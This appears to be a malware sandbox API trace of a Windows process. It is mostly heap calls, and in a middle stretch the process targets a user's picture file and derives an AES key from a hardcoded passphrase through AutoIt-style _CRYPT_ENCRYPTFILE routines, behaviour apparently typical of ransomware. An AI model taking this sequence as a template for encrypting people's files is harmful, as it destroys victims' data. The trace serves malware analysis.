hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.440] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.440] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.440] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0094.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0094.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0094.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0094.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0094.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0094.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0094.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0094.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0094.444] CloseHandle (hObject=0x258) returned 1 [0094.444] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.444] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0094.444] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37446c80, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0x8aa363d0, ftLastAccessTime.dwHighDateTime=0x1d5e73e, ftLastWriteTime.dwLowDateTime=0x8aa363d0, ftLastWriteTime.dwHighDateTime=0x1d5e73e, nFileSizeHigh=0x0, nFileSizeLow=0xf6d5, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="maAjSjcXjKdUlEc2T.bmp", cAlternateFileName="MAAJSJ~1.BMP")) returned 0x41ac2c0 [0094.444] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0094.445] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.445] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.445] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0094.501] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0094.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0094.501] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0094.502] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0094.502] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.502] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0094.502] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.502] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.502] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.503] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.503] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0094.503] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0094.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0094.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0094.503] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0094.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0094.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0094.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caaa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0094.504] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0094.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.504] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0094.504] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0094.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0094.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0094.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0094.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0094.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0094.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0094.506] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0094.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0094.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 